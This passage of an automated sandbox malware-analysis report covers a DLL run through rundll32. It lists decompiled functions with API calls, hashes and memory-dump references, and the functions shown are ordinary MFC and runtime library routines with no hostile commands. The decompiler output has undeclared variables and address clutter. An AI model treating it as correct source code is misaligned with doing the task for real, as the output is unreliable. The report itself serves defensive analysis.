                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ___addl
                                                                        • String ID:
                                                                        • API String ID: 2260456530-0
                                                                        • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                        • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}







                                                                        0x10029b2c
                                                                        0x10029b35
                                                                        0x10029b3e
                                                                        0x10029b47
                                                                        0x10029b78
                                                                        0x10029b78
                                                                        0x10029b88

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow$lstrcmplstrlen
                                                                        • String ID:
                                                                        • API String ID: 330964273-0
                                                                        • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                        • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                        0x100308ef
                                                                        0x100308f1
                                                                        0x100308f6
                                                                        0x1003090a
                                                                        0x1003090c
                                                                        0x10030912
                                                                        0x10030918
                                                                        0x1003091c
                                                                        0x10030924
                                                                        0x1003092a
                                                                        0x00000000
                                                                        0x1003092a
                                                                        0x1003092f

                                                                        APIs
                                                                          • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                        • GetDesktopWindow.USER32 ref: 100308FC
                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                        • ReleaseDC.USER32 ref: 10030924
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                        • String ID:
                                                                        • API String ID: 1260764132-0
                                                                        • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                        • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}





























                                                                        0x100128a7
                                                                        0x100128a7
                                                                        0x100128b0
                                                                        0x100128b5
                                                                        0x100128d1
                                                                        0x100129e4
                                                                        0x100129e4
                                                                        0x100129e6
                                                                        0x100129e6
                                                                        0x100129e9
                                                                        0x10012a04
                                                                        0x10012a04
                                                                        0x10012a07
                                                                        0x10012a1c
                                                                        0x10012a1c
                                                                        0x10012a09
                                                                        0x10012a09
                                                                        0x10012a0c
                                                                        0x00000000
                                                                        0x10012a0e
                                                                        0x10012a0e
                                                                        0x10012a17
                                                                        0x00000000
                                                                        0x10012a17
                                                                        0x10012a0c
                                                                        0x100129eb
                                                                        0x100129eb
                                                                        0x100129ee
                                                                        0x00000000
                                                                        0x100129f0
                                                                        0x100129f0
                                                                        0x100129f9
                                                                        0x100129f9
                                                                        0x100129fc
                                                                        0x100129fc
                                                                        0x100129fc
                                                                        0x100129ee
                                                                        0x10012a23
                                                                        0x10012a24
                                                                        0x10012a24
                                                                        0x100128d7
                                                                        0x100128d7
                                                                        0x100128d9
                                                                        0x100128d9
                                                                        0x100128e0
                                                                        0x100128e1
                                                                        0x100128e5
                                                                        0x100128ea
                                                                        0x100128f1
                                                                        0x100128f3
                                                                        0x100128f4
                                                                        0x100128f7
                                                                        0x100128f8
                                                                        0x100128f8
                                                                        0x100128fb
                                                                        0x10012900
                                                                        0x10012904
                                                                        0x10012907
                                                                        0x1001290a
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291f
                                                                        0x10012920
                                                                        0x10012922
                                                                        0x10012923
                                                                        0x10012923
                                                                        0x10012927
                                                                        0x10012928
                                                                        0x10012928
                                                                        0x10012929
                                                                        0x1001292b
                                                                        0x10012937
                                                                        0x1001293d
                                                                        0x1001293e
                                                                        0x10012945
                                                                        0x10012946
                                                                        0x10012948
                                                                        0x1001294d
                                                                        0x1001294f
                                                                        0x1001295b
                                                                        0x1001295c
                                                                        0x1001295d
                                                                        0x10012964
                                                                        0x10012965
                                                                        0x10012966
                                                                        0x1001296c
                                                                        0x10012971
                                                                        0x10012973
                                                                        0x1001297f
                                                                        0x10012980
                                                                        0x10012981
                                                                        0x10012988
                                                                        0x10012989
                                                                        0x1001298e
                                                                        0x10012994
                                                                        0x1001299c
                                                                        0x1001299e
                                                                        0x1001299e
                                                                        0x100129a9
                                                                        0x100129c1
                                                                        0x100129c4
                                                                        0x100129d6
                                                                        0x100129c6
                                                                        0x100129c6
                                                                        0x100129cd
                                                                        0x00000000
                                                                        0x100129cd
                                                                        0x100129ab
                                                                        0x100129ab
                                                                        0x100129b2
                                                                        0x100129b9
                                                                        0x100129b9
                                                                        0x100129b9
                                                                        0x100129dd
                                                                        0x100129de
                                                                        0x100129e2
                                                                        0x10012a32

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID: $
                                                                        • API String ID: 1807457897-3032137957
                                                                        • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                        • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018871 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E10018871(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E10018854((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x1004cf04; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E10017B90((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}














                                                                        0x10018871
                                                                        0x10018879
                                                                        0x1001887b
                                                                        0x10018894
                                                                        0x10018899
                                                                        0x1001889d
                                                                        0x1001889f
                                                                        0x100188a1
                                                                        0x100188a4
                                                                        0x100188a4
                                                                        0x100188ab
                                                                        0x100188ad
                                                                        0x100188b2
                                                                        0x100188b4
                                                                        0x100188b6
                                                                        0x100188bc
                                                                        0x100188bc
                                                                        0x100188dc
                                                                        0x100188de
                                                                        0x100188e0
                                                                        0x100188e0
                                                                        0x100188e6
                                                                        0x100188ea
                                                                        0x100188ef
                                                                        0x100188f0
                                                                        0x100188f2
                                                                        0x100188f4
                                                                        0x100188f4
                                                                        0x100188f7
                                                                        0x100188fb
                                                                        0x100188fd
                                                                        0x10018900
                                                                        0x10018903
                                                                        0x10018905
                                                                        0x10018905
                                                                        0x10018907
                                                                        0x1001890b
                                                                        0x1001890d
                                                                        0x10018910
                                                                        0x10018913
                                                                        0x10018915
                                                                        0x10018915
                                                                        0x10018917
                                                                        0x10018917
                                                                        0x1001891e

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: __shift_strcat_strlen
                                                                        • String ID: e+000
                                                                        • API String ID: 208078240-1027065040
                                                                        • Opcode ID: 1a341bb0d3ad14af8978000b563bb186d51df1d89655497ce7b3696246054d84
                                                                        • Instruction ID: 91aa6cf5b5fdaf298b495f8a89a630845dc3f9b5d40380b01f6205b1ce8f2fe9
                                                                        • Opcode Fuzzy Hash: 1a341bb0d3ad14af8978000b563bb186d51df1d89655497ce7b3696246054d84
                                                                        • Instruction Fuzzy Hash: 1321D2722093D59FD70A9E388C907A53BD19B03258F1C44BEE189CF292DA7ADBC5C352
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}











                                                                        0x10021810
                                                                        0x10021820
                                                                        0x10021823
                                                                        0x10021828
                                                                        0x1002182d
                                                                        0x10021830
                                                                        0x10021850
                                                                        0x10021850
                                                                        0x10021853
                                                                        0x10021856
                                                                        0x10021857
                                                                        0x10021861
                                                                        0x00000000
                                                                        0x10021837
                                                                        0x10021837
                                                                        0x1002183a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002183c
                                                                        0x10021846
                                                                        0x10021869
                                                                        0x10021877
                                                                        0x1002187f
                                                                        0x10021887
                                                                        0x1002188c
                                                                        0x1002188f
                                                                        0x10021892
                                                                        0x10021895
                                                                        0x10021898
                                                                        0x1002189e
                                                                        0x1002189f
                                                                        0x100218a2
                                                                        0x100218a5
                                                                        0x100218a8
                                                                        0x100218b2
                                                                        0x100218b4
                                                                        0x100218b4
                                                                        0x100218b2
                                                                        0x100218bf
                                                                        0x100218bf

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassInfo
                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                        • API String ID: 3534257612-2801496823
                                                                        • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                        • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x31534e0
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                        0x100165cd
                                                                        0x100165d3
                                                                        0x100165d9
                                                                        0x100165db
                                                                        0x100165db
                                                                        0x100165ec
                                                                        0x100165f3
                                                                        0x100165f9
                                                                        0x10016600
                                                                        0x10016606
                                                                        0x1001660f
                                                                        0x1001660f
                                                                        0x10016608
                                                                        0x1001660b
                                                                        0x1001660d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001660d
                                                                        0x1001661d
                                                                        0x10016628
                                                                        0x1001662e
                                                                        0x10016633
                                                                        0x1001663a
                                                                        0x1001664e
                                                                        0x10016658
                                                                        0x1001665e
                                                                        0x10016664
                                                                        0x1001663c
                                                                        0x1001663c
                                                                        0x1001663c
                                                                        0x1001666a

                                                                        APIs
                                                                        • ___initmbctable.LIBCMT ref: 100165DB
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName___initmbctable
                                                                        • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                        • API String ID: 767393020-2837366778
                                                                        • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                        • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}





















                                                                        0x10024c9b
                                                                        0x10024ca1
                                                                        0x10024ca5
                                                                        0x10024cab
                                                                        0x10024db7
                                                                        0x10024db7
